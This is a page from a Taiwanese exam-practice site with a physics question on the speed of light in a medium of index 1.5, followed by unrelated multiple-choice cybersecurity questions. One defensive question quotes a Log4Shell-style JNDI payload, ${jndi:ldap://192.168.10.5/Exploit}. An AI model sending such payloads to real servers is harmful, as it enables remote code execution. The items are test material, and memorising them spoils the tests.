阿摩線上測驗
登入
首頁
>
物理化學
>
93年 - 93 二技統測_環境類_專業科目(一):物理及化學#144571
> 試題詳解
50. 請問光經過一折射率為n=1.5的介質時,其速率為多少公里/秒?
(A) 2x10
5
(B) 2x10
8
(C) 4.5x10
5
(D) 4.5x10
8
答案:
登入後查看
統計:
尚無統計資料
相關試題
1. 下列何者最符合 MITRE ATT&CK 的橫向移動(Lateral Movement)技術? (A) 利用內部魚叉式網路釣魚獲得存取權 (B) 繞過使用者帳戶控制(User Account Control, UAC) (C) 通過可卸除式磁碟進行通信 (D) 使用 LLMNR/NBT-NS 下毒(Poisoning)及 SMB 中繼(Relay)
#4028157
2. 攻擊者利用跨站腳本攻擊(Cross-Site Scripting, XSS)竊取 Cookie,進而冒用使用者 會話(Session),這種行為屬於下列何種威脅? (A) 網路竊聽(Sniffing) (B) 水坑攻擊(Watering Hole) (C) 身分偽造(Impersonation) (D) 權限提升(Privilege Escalation)
#4028158
3. 某購物平台在進行系統架構優化時,發現會員查詢模組存在嚴重的「非授權資料存 取」弱點,經分析是由於開發人員未在伺服器端對請求參數中的識別碼進行權限驗 證所致。資安團隊在規劃該弱點的修補與風險緩解策略時,考量到系統的高可用性 與長期維護成本,下列哪一項策略在資安防護與架構整合上屬於最適切的規劃? (A) 採用基於物件的存取控制機制,在應用程式伺服器端實施身分驗證後的物件級授 權,驗證當前使用者是否具備該識別碼之存取權限 (B) 建立一套自動化的弱點偵測系統,針對該模組進行週期性的滲透測試,一旦偵測 到可存取的異常 ID,即透過系統自動封鎖該使用者的連線來源 IP (C) 在應用程式層部署 Web 應用程式防火牆(WAF) ,並將此類識別碼漏洞列入規則 庫進行攔截,以在不更動原始程式碼的情況下快速緩解風險 (D) 實施基於強制存取控制(MAC)的架構,將所有會員的存取請求強制進行安全標 籤對應,並要求所有舊有模組必須重新設計以符合安全層級規範
#4028159
複選題4. 關於伺服器偽造請求(Server-Side Request Forgery,SSRF)的描述,下列哪些選項較 為正確?(複選) (A) 此類弱點通常發生在跳轉網址或讀取特定網址圖片的參數沒有過濾內容,導致被 攻擊者利用 (B) 此類弱點無法用於掃描內網其他伺服器的 port,所以危害很小 (C) 此類弱點可以用來讀取其他 URL 協議,例如 file://、ftp://、gopher:// (D) 此類弱點無法用來掃描 127.0.0.1 或 localhost
#4028160
5. 從弱點管理的角度來看,此事件暴露了該平台在 哪個環節存在最嚴重的疏失? (A) 網站前端未能有效防禦跨網站指令碼(Cross-Site Scripting, XSS)攻擊 (B) 未能對所有員工進行充分的社交工程防範演練 (C) 公司的實體安全措施不足,導致機房被入侵 (D) 缺乏對第三方服務與軟體元件的攻擊面管理(Attack Surface Management)與及 時修補
#4028161
6. 【題組 1】情境如附圖所示。身為平台的資安應變經理,在攻擊者入侵後,在容器映 像檔儲存庫中污染基礎映像檔的行為,是近年來哪一種類型攻擊的典型手法? (A) 密碼噴灑攻擊(Password Spraying) (B) 中間人攻擊(Man-in-the-Middle, MitM) (C) 軟體供應鏈攻擊(Software Supply Chain Attack) (D) 阻斷服務攻擊(Denial-of-Service, DoS)
#4028162
7. 【題組 1】情境如附圖所示。身為平台的資安應變經理,為了緊急恢復平台服務並清 除所有受感染的容器,下列哪一項防護與應變實務在技術上最為即時且有效? (A) 要求雲端服務供應商出具一份完整的事件調查報告 (B) 利用雲端工作負載保護平台(CWPP)掃描運行中的容器,識別並終止所有受感 染的實例(Instance),同時觸發 CI/CD 流程以乾淨的映像檔重新部署 (C) 立即重新部署整個 Kubernetes 叢集,並從原始的映像檔進行重新安裝 (D) 手動登入每一台主機節點,一一找出並刪除惡意程序
#4028163
複選題8. 【題組 1】情境如附圖所示。身為平台的資安應變經理,為了徹底解決此次事件暴露 出的防護架構問題,並防止未來類似攻擊發生,平台應採取下列哪些防護強化措施? (複選) (A) 為所有開發人員的電腦安裝最新版的文書處理軟體 (B) 在開發流程中導入容器映像檔掃描與簽章機制,確保僅有受信任的映像檔能被部 署 (C) 實施更嚴格的網路出口流量過濾規則(Egress Filtering),阻擋加密貨幣挖礦等異 常的對外連線 (D) 建立零信任網路原則,嚴格限制 Kubernetes 叢集內部不同服務之間的存取權限
#4028164
9. 分析 WAF 攔截到的攻擊請求時,發現一段針對公司內部 Java Spring Boot 應用程式 的封包,內容包含:${jndi:ldap://192.168.10.5/Exploit} 已知該伺服器的 JDK 版本較 舊,未啟用 com.sun.jndi.ldap.object.trustURLCodebase=false。在無法立即升級應用程 式碼的情 況下, 下列 何項技術 對直接阻斷此類遠端程式碼執行(Remote Code Execution, RCE)攻擊最為適切? (A) 在防火牆封鎖所有連往 192.168.10.5 的 TCP 80 流量 (B) 將伺服器的 HTTPS 憑證更換為強加密演算法(如 RSA 4096) (C) 在 WAF 上啟用針對 jndi 關鍵字的輸入驗證規則 (D) 停用 Web 伺服器的 HTTP TRACE 方法
#4028165
10. 資安團隊收到一則關於「特定駭客組織利用零時差漏洞攻擊 VPN 設備」的威脅情資。 在尚未釋出官方修補程式(Patch)前,下列何項緩解措施最具防護實效? (A) 實施虛擬修補(Virtual Patching),在 WAF 或 IPS 阻擋特定攻擊特徵 (B) 忽略此情資,等待官方釋出正式修補程式後再處理 (C) 要求全體員工重新申請 VPN 帳號 (D) 立即公開招標並更換不同廠牌的 VPN 設備
#4028166
相關試卷
114年 - 114 公務升官等考試_薦任_商品檢驗:物理化學#133264
2025 年 · #133264
114年 - 114 專技高考_專利師(選試專業英文及物理化學)、專利師(選試專業日文及物理化學):物理化學#130114
2025 年 · #130114
113年 - 113 專技高考_專利師(選試專業英文及物理化學)、專利師(選試專業日文及物理化學):物理化學#122216
2024 年 · #122216
112年 - [無官方正解]112 國立嘉義大學_碩士班招生考試試題_應用化學系:物理化學#144354
2023 年 · #144354
112年 - 112 公務升官等考試_薦任_商品檢驗:物理化學#117324
2023 年 · #117324
110年 - 110 公務升官等考試_薦任_商品檢驗:物理化學#103703
2021 年 · #103703
110年 - 110 專技高考_專利師(選試專業英文及物理化學)、專利師(選試專業日文及物理化學):物理化學#100751
2021 年 · #100751
109年 - 109 專技高考_專利師(選試專業英文及物理化學)、專利師(選試專業日文及物理化學):物理化學#90221
2020 年 · #90221
108年 - 108 公務升官等考試_薦任_商品檢驗:物理化學#80518
2019 年 · #80518
108年 - 108 專技高考_專利師(選試專業英文及物理化學)、專利師(選試專業日文及物理化學):物理化學#78681
2019 年 · #78681